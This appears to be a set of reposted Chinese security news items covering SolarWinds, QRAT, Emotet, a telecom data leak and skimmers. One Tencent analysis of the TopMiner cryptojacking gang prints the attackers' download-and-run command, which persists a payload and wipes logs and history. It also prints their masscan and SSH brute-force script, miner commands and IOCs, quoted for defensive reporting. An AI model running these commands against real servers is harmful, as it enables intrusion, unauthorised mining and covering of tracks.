Solarwinds 大规模黑客攻击要比预想的要糟糕，近日美国司法部承认由 Microsoft 365 提供的电子邮件服务被入侵。在一份声明中，美国司法部承认有 3% 的邮箱被黑客入侵。不过本周三，司法部发言人 Marc Raimondi 表示：“目前我们没有迹象表明任何机密系统受到影响”。 根据目前的统计数据，已经有超过 1.8 万家企业因 Solarwinds 而被黑客入侵，美国联邦调查局和美国国家安全局都将此次攻击归咎于高级持续性威胁（APT）行为者，很可能是俄罗斯。司法部已根据《联邦信息安全现代化法案》宣布此次黑客攻击为重大事件，并表示将根据联邦机构，国会和公众的需要继续公开相关内容。         （消息来源：cnBeta；封面来自网络）

Cybesecurity研究人员今天观察到一个恶意垃圾邮件活动，该活动通过发布美国总统唐纳德·特朗普（Donald Trump）的丑闻假视频来传播远程访问木马（RAT）。 电子邮件的主题为“ GOOD LOAN OFFER !!”，附带一个名为“ TRUMP_SEX_SCANDAL_VIDEO.jar”的Java存档（JAR）文件，一旦被下载，该文件会将Qua或Quaverse RAT（QRAT）安装到系统中。 Trustwave高级安全研究员戴安娜·洛帕（Diana Lopera）在文章中说：“我们怀疑，黑客正试图利用最近结束的总统大选的噱头进行网络犯罪活动。” 最新的恶意活动是八月份发现的基于Windows的QRAT下载器的变体。 感染链从包含嵌入式附件或指向恶意zip文件的链接的垃圾邮件开始，它们均会检索使用Allatori Java混淆器加扰的JAR文件（“ Spec＃0034.jar”）。 第一阶段下载程序将Node.Js平台设置到系统上，下载并执行称为“ wizard.js”的第二阶段下载程序，该程序负责持久获取并运行Qnode RAT（“ qnode-win32-ia32。 js”）。 QRAT是典型的远程访问木马，具有获取系统信息、执行文件操作以及从Google Chrome、Firefox、Thunderbird和Microsoft Outlook等应用程序获取凭据的功能。 这次恶意活动的变化是包含了一个新的弹出警报，该警报会通知受害者正在运行的JAR是用于渗透测试的远程访问软件。这也意味着，一旦用户单击“确定”按钮，该样本的恶意行为就会开始显现。 此外，JAR下载程序的恶意代码被分为不同的随机编号的缓冲区以逃避检测。 其他变化包括JAR文件大小的增加以及为更新的恶意软件链而取消了第二阶段的下载程序，更新的恶意软件链可立即获取QRAT有效负载（现称为“ boot.js”）。 就其本身而言，RAT除了通过VBS脚本负责保持在目标系统上的持久性外，还使用了base64编码对代码进行了加密。 Topera总结说：“自我们首次检查以来，该恶意软件的威胁已大大增强。”他敦促管理员在电子邮件安全网关中阻止传入的JAR。         消息及封面来源：The Hacker News，译者：江。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.c

12 月 28 日，沃达丰（Vodafone）旗下意大利运营商 Ho Mobile 被曝发生了用户数据泄露事件。当时一名安全分析师指出，其在某个暗网论坛上发现了有人在兜售电信公司的数据库。虽然一开始打算冷处理，但本周一的时候，Ho Mobile 最终还是证实了本次大规模个人数据泄露。据说受影响的用户数量大约为 250 万，目前 Ho Mobile 正督促用户尽快更换 SIM 卡。 本周一，Ho Mobile 在官网上发布了一则公告，同时以短信形式向所有受影响客户发送了消息。 早些时候，@Bank_Security 猜测黑客攻破了这家运营商的服务器，并且盗走了详尽的用户数据，包括全名、手机号码、社保号码、电子邮件地址、出生日期、国籍、以及家庭住址。 虽然 Ho Mobile 表示本次入侵不涉及任何财务数据或通话详情，但还是承认黑客已掌握用户 SIM 卡相关的详情。 为避免欺诈或 SIM 卡伪造攻击，Ho Mobile 敦促所有受影响的客户（如有必要）及时更换 SIM 卡，且运营商承诺不收取任何费用。 Ho Mobile 写道：“你可携带有效身份证件，前往任何一处授权门店，并要求免费更换 SIM 卡”。后续该运营商还将与当地执法机构一道，对本次黑客攻击事件的幕后展开进一步的调查。       （消息及封面来源：cnBeta）

一、概述 腾讯主机安全（云镜）检测到挖矿木马TopMiner近期攻击十分活跃，该木马通过SSH弱口令爆破进行攻击入侵，会清除竞品挖矿木马，同时会使用爆破工具在内网横向传播。根据其挖矿钱包收益估算，约有1.5万台服务器被该团伙控制挖矿。由于其使用的挖矿木马名为top，腾讯安全将其命名为TopMiner挖矿木马。 TopMiner挖矿团伙针对SSH弱口令进行爆破攻击，成功后执行命令下载恶意shell脚本，并将启动脚本写入crontab定时任务进行持久化，shell脚本继续下载挖矿木马nginx、top启动挖矿。 木马入侵系统后，还会下载SSH爆破程序sshd，扫描到网络中开放22端口的Linux系统机器后，通过实时更新的密码字典对其root账号进行爆破攻击。攻击者在爆破攻击程序代码留下注释：”宽带充足基本可以12个小时扫描全球”，气焰可谓十分嚣张。 分析过程中，我们还在黑客控制的服务器上发现了具有执行远程命令功能的backdoor木马、具有DDoS攻击、远程shell功能的kaiji木马、黑客可使用这些木马对目标系统进行完全控制。 腾讯云主机安全（云镜）支持对云主机是否存在SSH空口令、弱口令进行检测并向客户告警，通过分析获得流行病毒木马内置的弱密码字典来检测云主机弱密码风险，具有很强的实战性。腾讯安全专家建议企业安全运维人员尽快解决服务器配置弱口令的风险。 自查处置建议 腾讯安全专家建议企业安全运维人员对服务器进行检查，清理以下相关项： 文件和进程： /tmp/.top-unix/nginx /tmp/.ICE-unix1/top /srv/.ICE-unix1/sshd /srv/.ICE-unix1/scan.sh /etc/ipv6_addrconf /etc/crypto Crontab定时任务： /tmp/.top-unix/top            -o              stratum+tcp://pool.supportxmr.com:8080               -u 42GLbQu8JBqVedDLHdpJEL8U5hSHwSuKh36HBebxeszHFEYDFLG5doz5LVsgAxfYoEJBQpeU39oq81MaJUmMUXYz2ZZXFXN -p X /tmp/.top-unix/nginx           -o           stratum+tcp://mine.c3pool.com:15555                 -u 43e7GPvFJNrH9X8xeByMkCcqkBr95rZ8rH3YVB13mgYMiQTcJ4Ehtx8ZMVJvWpqnQZ41aMkuiUCFN23BW2ZUpptsH8k7XbL -p X /etc/crypto 腾讯安全响应清单 腾讯安全系列产品可针对TopMiner挖矿木马攻击传播的各个环节进行阻断拦截： 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）TopMiner挖矿团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1）TopMiner挖矿团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts 云原生 安全 防护 云防火墙 （Cloud Firewall，CFW） 基于网络流量进行威胁检测与主动拦截，已支持： 1）TopMiner木马关联的IOCs已支持识别检测； 2）检测SSH弱口令爆破攻击。 有关云防火墙的更多信息，可参考：  https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 （Cloud Workload Protection，CWP） 1）已支持查杀TopMiner木马程序； 2）主动检测系统是否存在SSH弱口令并提示； 3）检测SSH弱口令爆破攻击。 腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 1）已支持通过协议检测TopMiner木马与服务器的网络通信。 关于T-Sec高级威胁检测系统的更多信息，可参考： https://cloud.tencent.com/product/nta   二、详细分析 2.1、攻击入侵方式 病毒通过SSH弱口令爆破入侵系统，随后执行恶意命令下载脚本crypto，并将其写入crontab定时任务。 bash -c cd /etc wget -P /etc http://103.45.183.12:808/crypto chmod 0777 crypto nohup /etc/crypto > /dev/null 2>&1 & chattr +i /etc/crypto echo "/etc/crypto">>/etc/rc.local echo "/etc/crypto">>/etc/crontab echo > /var/log/wtmp history -c crypto会检查自己的挖矿进程/tmp/.ICE-unix1/top是否存在，如果不存在会判断是否有竞品挖矿木马存在，然后会杀掉竞品挖矿木马进程kswapd0、rsync、tsm、work32、work64、go、joseph，然后从C2服务器下载挖矿木马top并启动挖矿。 Top挖矿木马下载地址为：http[:]//xiazai.qq360bidu.me:808/top 挖矿使用矿池：91.121.140.167:443 挖矿使用钱包： 43e7GPvFJNrH9X8xeByMkCcqkBr95rZ8rH3YVB13mgYMiQTcJ4Ehtx8ZMVJvWpqnQZ41aMkuiUCFN23BW2ZUpptsH8k7XbL 根据其矿池算力平均340KH/s，可推算该挖矿团伙已控制约1.5万台服务器进行挖矿，平均每天获利约154美元（0.17个门罗币），折合人民币约1000元。 2.2、横向移动 木马入侵系统后会接着下载端口爆破程序sshd以及待攻击的IP列表ips.txt、用户名字典user.txt、密码字典password.txt到/srv/.ICE-unix1/目录下。 观察文件被创建的时间，除了爆破程序sshd和用户名列表user.txt是6月份被修改过（可能是初次创建），其他文件操作时间均为12月，并且密码字典文件password.txt的修改时间就在近期。可见其感染系统后，攻击模块一直处于活跃状态，并且攻击对象、密码字典在持续更新扩充。 其中一个待爆破IP列表里有超过19万个IP地址： 爆破用户名：root，其中一个密码字典有1700余个密码，部分如下： 攻击时脚本scan.sh负责启动扫描进程masscan和爆破进程sshd，脚本代码如下： #!/bin/bash yum install masscan -y apt-get install masscan -y if [ $# -ne 4 ]; then echo "脚本默认安装扫描工具为masscan" echo "运行参数应为 ./scan.sh IP范围 端口 扫描线程 爆破线程" echo "IP范围支持1.0.0.0-1.255.255.255或 1.0.0.0/8这种" echo "扫描线程取1-100万左右,G口肯定是30-100万跑,线程越低结果越准,宽带充足基本可以1 2个小时扫描全球" exit fi echo '' > a.txt masscan $1 -p $2 --rate $3 --excludefile pingbi.txt -oL a.txt echo '' > ip.txt cat a.txt | grep -B0 open | grep -oP '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | sort -u > ip.txt./sshd ip.txt user.txt password.txt $2 $4   在实际攻击过程中，针对22端口进行爆破，爆破线程被设置为1000。 ./sshd ips.txt user.txt password.txt 22 1000   2.3、该团伙使用的其他木马 除了shell脚本、挖矿木马、爆破程序之外，我们在黑客控制的服务器上还发现了具有DDoS和远程shell功能的Kaiji木马，以及backdoor木马cnet2。 挖矿木马“ipv6_addrconf”、“systemd”、“top”为挖矿程序XMRig编译，其中“ipv6_addrconf”、“systemd”通过加UPX壳保护。 backdoor木马“cnet2”，具有监听端口，连接服务端，下载文件，执行远程命令等功能。 Kaiji木马“3”、“amd64”、“php-fpm”采用Go语言编写，具有DDoS攻击、远程shell以及SSH爆破攻击等功能，详情可参考腾讯安全此前的分析报告 https://s.tencent.com/research/report/1168.html。             IOCs IP 103.45.183.12（ZoomEye搜索结果） Domain xiazai.qq360bidu.me URL http[:]//xiazai.qq360bidu.me:808/top http[:]//103.45.183.12:808/crypto MD5 amd64 c491074d7723e6a6b1b1b8fb002f09b6 cnet2 9d2681b69116f866477dbe3bda0cbf49 top f74d1803befb993040aab866dbe6f12f systemd 640c6f1e7a5efdba49aeaa06d0dac304 crypto 9f0993ac09182d9ec08d1c562d2cfcbd sleep fbf0dccc0d9e674858d63e521eb122a0 sshd 15a653e96bada2fc2e47db59d863f4ff ipv6_addrconf b641d939b7cf70606ff5826f68c47d29 钱包： 42GLbQu8JBqVedDLHdpJEL8U5hSHwSuKh36HBebxeszHFEYDFLG5doz5LVsgAxfYoEJBQpeU39oq81MaJUmMUXYz2ZZXFXN 43e7GPvFJNrH9X8xeByMkCcqkBr95rZ8rH3YVB13mgYMiQTcJ4Ehtx8ZMVJvWpqnQZ41aMkuiUCFN23BW2ZUpptsH8k7XbL

据《纽约时报》报道，美国网络司令部司令兼美国国安局局长保罗·中曾根在选举日曾报告说，反对俄罗斯干预总统竞选的战斗已经取得了重大成功，并暴露了对方的在线武器、工具和谍报技术。他对记者说：“我们拓宽了行动范围，感觉我们现在的情况非常好。”八周后， 中曾根将军和其他负责网络安全的美国官员现在被他们至少9个月来所忽略的事情所消耗：现在被认为影响到多达250个联邦机构和企业的黑客攻击，俄罗斯的目标不是选举系统，而是美国政府的其他部门和许多美国大公司。 入侵事件曝光三周后，美国官员仍在试图了解俄罗斯人的所作所为，究竟是简单的在美国官僚系统内部进行间谍活动，还是将“后门”接入政府机构、大公司、电网以及开发和运输新一代核武器的实验室。 《纽约时报》认为，至少这些事件已经引发了美国政府和私营部门网络易受攻击的警报，并提出了美国国家网络防御系统为何失败的问题。 鉴于此次漏洞并不是由任何一个分担网络防御责任的政府机构–军方的网络司令部和国家安全局（均由中曾根将军掌管）以及国土安全部–发现的，而是由一家私营网络安全公司FireEye发现的，因此这些问题显得尤为紧迫。 “这看起来比我最初担心的要糟糕得多，”弗吉尼亚州民主党参议员、参议院情报委员会排名成员马克·华纳说。“它的规模不断扩大。很明显，美国政府错过了它。”“而如果FireEye没有站出来，”他补充说，“我不确定我们到今天还能不能完全意识到这一点。” 对调查情报机构认为是俄罗斯S.V.R.情报部门行动的关键人物的采访显示了这些要点： 漏洞的范围比最初认为的要大得多。最初的估计是，俄罗斯只向18000个政府和私人网络中的几十个网络发起攻击，他们在德克萨斯州一家名为SolarWinds的公司制造的网络管理软件中插入代码，从而获得了访问权。但随着亚马逊和微软等提供云服务的企业深入挖掘证据，现在看来，俄罗斯利用供应链的多个层面获得了多达250个网络的访问权限。 黑客从美国境内的服务器进行管理入侵，利用国家安全局从事国内监控的法律禁令，躲过了国土安全部部署的网络防御措施。 美国网络司令部和国家安全局在外国网络深处放置的“预警 ”传感器，用于侦测酝酿的攻击，显然是失败的。目前也还没有迹象表明，有任何人类情报机构向美国发出了黑客攻击的警报。 美国政府对选举防御的重视虽然在2020年至关重要，但可能转移了资源和注意力，使其无法解决保护软件“供应链”等酝酿已久的问题。在私营部门，也是如此，像FireEye和微软这样专注于选举安全的公司，现在也透露他们被攻破，成为更大的供应链攻击的一部分。 据现任和前任员工以及政府调查人员称，被黑客用作攻击渠道的SolarWinds公司，其产品的安全性能历来不高，因此很容易成为目标。该公司首席执行官 Kevin B. Thompson已经回避了他的公司是否应该发现入侵的问题。 部分被入侵的SolarWinds软件是在东欧设计的，美国调查人员目前正在研究入侵是否源自那里，因为俄罗斯情报人员在那里根深蒂固。 攻击背后的意图仍被掩盖。但随着新政府在不到三周后上任，一些分析人士表示，俄罗斯人可能试图动摇华盛顿对其通信安全的信心，并展示他们的cyberarsenal，以便在核武谈判之前获得对当选总统拜登的影响力。 “我们仍然不知道俄罗斯的战略目标是什么，”曾在奥巴马政府期间担任国土安全部高级网络官员的Suzanne Spaulding说。“但我们应该关注的是，这其中的一部分可能超出了侦察的范围。他们的目标可能是让自己处于对新政府有影响力的地位，就像拿枪指着我们的脑袋，以阻止我们采取行动对抗普京。” 日益增长的打击名单 美国政府显然是攻击的主要焦点，财政部、国务院、商务部、能源部和五角大楼的部分机构都被证实被渗透。国防部坚持认为对其系统的攻击是不成功的，尽管它没有提供证据。 但黑客攻击也攻破了大量的公司，其中许多公司尚未出面。SolarWinds被认为是俄罗斯在黑客攻击中使用的几家供应链供应商之一。微软截至12月17日已统计出40名受害者，起初它说自己没有被入侵，但本周才发现自己被入侵了–而且其软件的经销商也被入侵了。亚马逊情报团队此前未报告的评估发现，受害者人数可能是其五倍之多，不过官员警告说，其中一些人可能被重复计算。 官员们在公开场合表示，他们不相信来自俄罗斯S.V.R.的黑客攻破了包含敏感通信和计划的机密系统。但私下里，官员们表示，他们仍不清楚可能被窃取的内容。 他们说，他们担心黑客可能从联邦能源监管委员会等受害者那里窃取了微妙但不保密的数据，包括 “黑启动(Black-Start) “，即美国计划在大停电时如何恢复电力的详细技术蓝图。 这些计划将给俄罗斯提供一个目标系统的命中名单，以防止其在2015年在乌克兰发动的攻击中恢复电力，在深冬时关闭电力6小时。莫斯科早就在美国电网中植入了恶意软件，美国也对俄罗斯做了同样的事情，以示威慑。 供应链受损 到目前为止，调查的一个主要焦点是SolarWinds，这家位于奥斯汀的公司，其软件更新被黑客入侵。但美国国土安全部的网络安全部门认为，黑客也是通过其他渠道工作的。而上周，另一家安全公司CrowdStrike透露，它也被同样的黑客盯上了，但没有成功，但通过一家转售微软软件的公司。 由于经销商经常受托设置客户的软件，他们–像SolarWinds一样–可以广泛进入微软客户的网络。因此，他们可以成为俄罗斯黑客的理想木马。情报官员对微软没有更早发现这次攻击表示愤怒；该公司周四表示，黑客查看了其源代码，但没有透露其哪些产品受到影响，也没有透露黑客在其网络内部停留了多长时间。 Obsidian Security公司创始人Glenn Chisholm表示：“他们瞄准了供应链中最薄弱的环节，并通过我们最信任的关系进行攻击。” 对SolarWinds现员工和前员工的采访表明，它迟迟没有将安全作为优先事项，即使其软件被美国首屈一指的网络安全公司和联邦机构采用。员工们表示，在受过培训的会计师和前首席财务官汤普森先生的领导下，公司对业务的每一个部分都进行了检查，以节约成本，而普通的安全实践则因其费用而被摒弃。他的方法帮助SolarWinds的年利润率从2010年的1.52亿美元增加了近三倍，到2019年超过4.53亿美元。 但其中一些措施可能会使公司及其客户面临更大的攻击风险。SolarWinds将其大部分工程转移到捷克共和国、波兰和白俄罗斯的办公室，在那里，工程师可以广泛访问俄罗斯特工入侵的Orion网络管理软件。该公司仅表示，对其软件的操纵是人为黑客所为，而非计算机程序。该公司没有公开处理内部人员参与入侵的可能性。 《纽约时报》最近几周接触的SolarWinds客户中，没有一个人知道他们依赖的是在东欧维护的软件。许多人表示，他们甚至直到最近才知道自己使用的是SolarWinds软件。 即使在整个联邦网络中安装了它的软件，员工们说，SolarWinds只是在2017年，在新的欧洲隐私法的惩罚威胁下，才加装了安全防护措施。员工说，直到那时，SolarWinds才聘请了第一位首席信息官，并安装了一位 “安全架构 “副总裁。 SolarWinds的前网络安全顾问Ian Thornton-Trump表示，他当年曾警告管理层，除非它对内部安全采取更积极的态度，否则网络安全事件将是 “灾难性的”。在他的基本建议被忽视后，桑顿-特朗普先生离开了公司。 SolarWinds拒绝回应有关其安全性是否充分的问题。在一份声明中，它说它是 “高度复杂、复杂和有针对性的网络攻击的受害者”，并正在与执法部门、情报机构和安全专家密切合作进行调查。 但安全专家指出，在发现俄罗斯攻击后数天，SolarWinds的网站才停止向客户提供受影响的代码。 攻大于守 近年来，数十亿美元的网络安全预算流向了进攻性的间谍活动和先发制人计划，也就是中曾根将军所说的 “超前防御 “的需要，通过入侵对手的网络，尽早了解他们的行动，并在必要时，在他们发动攻击之前，在自己的网络内部进行反击。但这种方法虽然被誉为早就应该采取的先发制人的策略，但却错过了俄罗斯的漏洞。 据FireEye报道，俄罗斯人通过从美国境内的服务器发动攻击，在某些情况下，他们使用的计算机与受害者在同一个城镇或城市，利用了国家安全局的权力限制。国会没有赋予该机构或国土安全局任何进入或保卫私营部门网络的权力。正是在这些网络上，S.V.R.特工们不太小心，留下了他们入侵的线索，FireEye最终得以发现。 通过将自己插入到SolarWinds的猎户座更新中，并使用自定义工具，他们还避免了跳过国土安全局在政府机构中部署的 “爱因斯坦 “检测系统的警报，以捕捉已知的恶意软件，以及所谓的C.D.M.程序，该程序是明确设计用来提醒机构注意可疑活动的。 一些情报官员质疑，政府是否如此专注于选举干预，以至于在其他地方制造了空子。情报机构几个月前得出结论，认为俄罗斯已经确定无法渗透到足够多的选举系统来影响选举结果，而是将注意力转移到转移可能剥夺选民权利的勒索软件攻击，以及旨在播撒不和谐的影响行动，引发对系统完整性的怀疑，改变选民的想法。 早在2019年10月就开始的SolarWinds黑客攻击事件，以及对微软经销商的入侵，让俄罗斯有机会攻击多个联邦机构中最脆弱、最不设防的网络。 中曾根将军拒绝接受采访。但国家安全局发言人查尔斯-K-斯塔德兰德说。“我们不认为这是一个’非此即彼’的权衡。选举安全工作中构建的行动、见解和新框架，对国家和美国政府的网络安全态势有着广泛的积极影响。” 事实上，美国似乎已经成功说服了俄罗斯，即旨在改变选票的攻击将促使俄罗斯采取代价高昂的报复行动。但随着入侵规模的凸显，美国政府显然未能说服俄罗斯，执行对联邦政府和企业网络的大范围黑客攻击会有相当的后果。 把黑客“赶出去” 情报官员说，他们可能要花几个月甚至几年的时间才能对黑客攻击事件有一个全面的了解。 自2017年提取一名克里姆林宫高层线人以来，中情局对俄罗斯行动的了解已经减少。而情报官员说，S.V.R.通过避免可能向国家安全局暴露机密的电子通讯，一直保持着世界上最有能力的情报部门之一。 对S.V.R.最好的评估来自荷兰人。2014年，为荷兰情报和安全总局工作的黑客刺破了该组织使用的电脑，至少观察了一年，并一度将其拍下。 正是荷兰人在2014年和2015年帮助提醒白宫和国务院他们的系统遭到S.V.R.黑客攻击，上个月，他们抓住了两名被指控渗透到荷兰科技公司的S.V.R.特工，并将其驱逐出荷兰。虽然该组织并不以破坏性著称，但其渗透到的计算机系统中却很难驱逐。 当S.V.R.闯入国务院和白宫的非机密系统时，时任国家安全局副局长的理查德-莱杰特说，该机构进行的数字相当于“徒手搏斗”。有一次，S.V.R.获得了调查人员用来连根拔除俄罗斯后门的NetWitness Investigator工具的访问权限，以这样的方式操纵它，使黑客继续逃避检测。 调查人员说，他们会认为自己已经把S.V.R.“赶出去”了，却发现这群人从另一扇门“爬了进来”。 一些安全专家说，把这么多庞大的联邦机构赶出S.V.R.可能是徒劳的，唯一的出路可能是关闭系统，重新开始。其他人说，在大流行期间这样做将是非常昂贵和耗时的，新政府将不得不努力识别和控制每一个受损的系统，然后才能校准响应。 “S.V.R.是故意的，他们很复杂，而且他们没有像我们在西方国家那样的法律约束，”前政府情报分析师亚当-达拉说，他现在是安全公司Vigilante的情报总监。他补充说，制裁、起诉和其他措施都没能阻挡住S.V.R.，它已经显示出它可以迅速适应。 “他们现在正在非常密切地观察我们，”达拉说。“而且他们会相应地进行调整。”         （消息来源：cnBeta，封面来自网络）

援引《纽约时报》报道，SolarWinds 被黑事件对美国政府机构、私营企业造成的危害可能比预期的更加严重。根据目前掌握的最新信息，大约有超过 250 家美国联邦机构和企业受到影响。 微软表示，黑客入侵了 SolarWinds 的 Orion 监控和管理软件，从而让他们能够冒充该组织现有的任意用户和帐号，包括拥有高级别权限的账户。纽约时报报道称，疑似有俄罗斯政府背景的黑客组织利用供应链的层级来访问这些机构的系统。 纽约时报在报道中指出，美国网络司令部和国家安全局在外国网络内部放置的用于检测潜在攻击的预警传感器似乎在这次事件中失效了。此外，报道中还指出在今年总统大选期间，政府还利用了 SolarWinds 的资源和技术来进行检测，从而让黑客躲过了美国国土安全部门的检测。 本周早些时候，微软发现多个系统被渗透，其中不仅仅只是 SolarWinds 恶意代码。黑客能够 “查看一些源代码库中的源代码”，但授予访问权限的黑客账户并没有修改任何代码或系统的权限。 不过一个好消息是，微软发现“没有证据表明生产服务或客户数据被访问”，“没有迹象表明我们的系统被用来攻击他人”。         （消息及封面来源：cnBeta）

芬兰国会议员表示：“芬兰议会技术监控部门发现，芬兰议会在2020年秋天遭受了网络攻击，此次攻击活动可能导致议员的电子邮件帐户遭到入侵。” 2020年秋天同一时刻，与俄罗斯有关的黑客访问了部分挪威议会代表的电子邮件数据。 芬兰中央刑警（KRP）正在议会的支持下调查安全漏洞。根据KRP专员Tero Muurman的说法，这次攻击互活动很可能是民族主义者开展的，目前未对议会的基础设施造成损害。“此次攻击活动影响广泛，但不幸的是，我们仍无法提供确切的数字。” 芬兰议会会长AnuVehviläinen表示，此次事件针对芬兰社会民主的恶意攻击活动。“我们不能接受任何形式的针对政府或非政府机构的网络攻击活动，” 她补充说，“为了加强网络安全，我们需要采取相关国家措施，配合欧盟和其他国际合作中的积极行动。”         消息来源：Security Affairs，封面来自网络，译者：江。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.c  

安全专家警告：黑客利用信用卡分离器可以收集Shopify、BigCommerce、Zencart和Woocommerce在线商店的付款信息，通过伪造付款表格，记录顾客进入实际结帐页面之前输入的信息。 在顾客提供了信用卡数据后，页面将引导顾客返回到实际付款页面，以避免引起怀疑。 该网络攻击活动之所以出色，是因为它针对不同平台，黑客可能已经破坏了被攻击商店的共享组件。 专家指出，这种多平台分离器使用的是编程生成的渗透域。第一个渗透域于2020年8月31日注册。 zg9tywlubmftzw5ldza.com; zg9tywlubmftzw5ldze.com; zg9tywlubmftzw5ldzu.com： zg9tywlubmftzw5ldzq.com; zg9tywlubmftzw5ldzm.com; zg9tywlubmftzw5ldzy.com; zg9tywlubmftzw5ldzi.com; zg9tywlubmftzw5ldzg.com …………………………………….. Sansec总结称：“此次攻击活动表明在线平台并非获利欺诈的边界，无论顾客是否输入付款详细信息，都存在一定的风险。”       消息及封面来源：Security Affairs，译者：江。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.c

黑客可能已利用SolarWinds Orion软件中的身份验证绕过漏洞，在目标环境中部署SUPERNOVA恶意软件。 CERT协调中心发布的咨询报告表示，用于与所有其他Orion系统监视和管理产品接口的SolarWinds Orion API存在安全漏洞（CVE-2020-10148），该漏洞可能允许黑客执行未经身份验证的攻击API命令，从而导致SolarWinds实例的妥协。 SolarWinds在12月24日发布的安全公告表示，黑客可通过利用Orion Platform中的漏洞来部署恶意软件。但到目前为止，我们仍不清楚相关漏洞的细节。 在过去的一周中，Microsoft透露黑客可能正在滥用SolarWinds的Orion软件，在目标系统上投放另一种名为SUPERNOVA的恶意软件。 网络安全公司Palo Alto Networks的Unit 42威胁情报小组和GuidePoint Security也证实了这一点，他们都将其描述为.NET Web Shell：一种通过修改SolarWinds Orion应用程序的“ app_web_logoimagehandler.ashx.b6031896.dll”模块。 虽然DLL的目的是通过HTTP API将用户配置的图像返回到Orion Web应用程序的其他组件，但恶意添加使它可以从被控制的服务器接收远程命令并在服务器用户上下文中的内存执行命令。 Unit 42研究人员指出：“SUPERNOVA的新颖之处在于：在内存中执行、其参数存在极强的复杂性、.NET运行时实施完整的编程API存在极强的灵活性。” 政府机构和网络安全专家正在努力挽救此次黑客攻击的后果，并汇总全球入侵活动。 为了修复身份验证绕过漏洞，安全专家建议用户将SolarWinds Orion Platform更新至最新版本： 2019.4 HF 6（2020年12月14日发布） 2020.2.1 HF 2（2020年12月15日发布） 2019.2 SUPERNOVA补丁（2020年12月23日发布） 2018.4 SUPERNOVA补丁（2020年12月23日发布） 2018.2 SUPERNOVA补丁（2020年12月23日发布）       消息及封面来源：The Hacker News，译者：江。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 

经过将近两个月的休整之后，Emotet僵尸网络复苏，并开展了每天数十万个网络攻击活动。 Emotet僵尸网络于2014年以银行木马的身份诞生，并发展成提供全方位服务的威胁传递机制。它可在受害者计算机上安装一系列包括信息窃取者、电子邮件收集器、自我传播机制等恶意软件。该僵尸网络最近一次出现是在10月份，目标群体是民主党全国委员会（DNC）志愿者。五个月的中断之后，它在7月重新活跃，并丢弃了Trickbot木马。2月份的一次竞选活动中，有人发现了来自受害者银行的短信。 Cofense研究人员布拉德·哈斯（Brad Haas）在星期二的博客中说：“Emotet僵尸网络后是恶意电子邮件活动最多的发件人之一，但通常一次休眠数周或数月。” “今年，这种中断从2月持续到7月中旬，这是Cofense在过去几年中看到的最长的中断。从那以后，他们观察到整个十月底的Emotet僵尸网络活动正常，直到今天都没有新的案例。” 研究人员说，僵尸网络在有效载荷方面也始终如一。在十月份，最常见的辅助负载是TrickBot、Qakbot和ZLoader，而今天我们观察到的是TrickBot。 TrickBot恶意软件是众所周知的复杂木马，于2016年作为银行恶意软件首次开发，与Emotet一样，它具有自我转换和添加新功能 以 逃避检测 或增强其感染能力的历史。感染了TrickBot木马的用户的设备将成为僵尸网络的一部分，黑客可使用该僵尸网络加载第二阶段的恶意软件，研究人员称其为“几乎所有其他恶意软件有效负载的理想丢弃程序”。TrickBot感染的典型后果是银行帐户被接管、高额电汇欺诈和勒索软件攻击。它最近实现了旨在检查目标系统的UEFI / BIOS固件的功能。微软和其他公司于10月对恶意软件的基础架构进行拆除之后，该恶意软件却严重复苏。 Proofpoint在Twitter上指出： “我们看到了相关英文、德文、西班牙文、意大利文并受密码保护的zip和URL的线程劫持的带有Word附件的诱饵。” Proofpoint威胁研究高级主管Sherrod DeGrippo说：“我们的团队仍在审核新样品，到目前为止，我们只发现了微小的变化。例如，Emotet二进制文件现在被用作DLL而不是.exe。当Emotet运行时，我们每天会观察到数十万封电子邮件。”她指出：“我们通常会看到Emotet在12月24日至1月初停止运营。如果他们继续这种模式，那么最近的活动对他们来说将是短暂而罕见的。” 研究人员同时指出，“黑客在不同的网络诱饵之间交替变化，以使社会工程学用户能够使用包括COVID-19主题的宏。尽管缺乏重大发展，该恶意软件的复兴仍应引起人们的注意。” 鉴于今年的严峻形势，安全人员建议相关组织和个人应提高警惕，并继续采取相关保护措施。         消息及封面来源：Threat Post；译者：江。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ”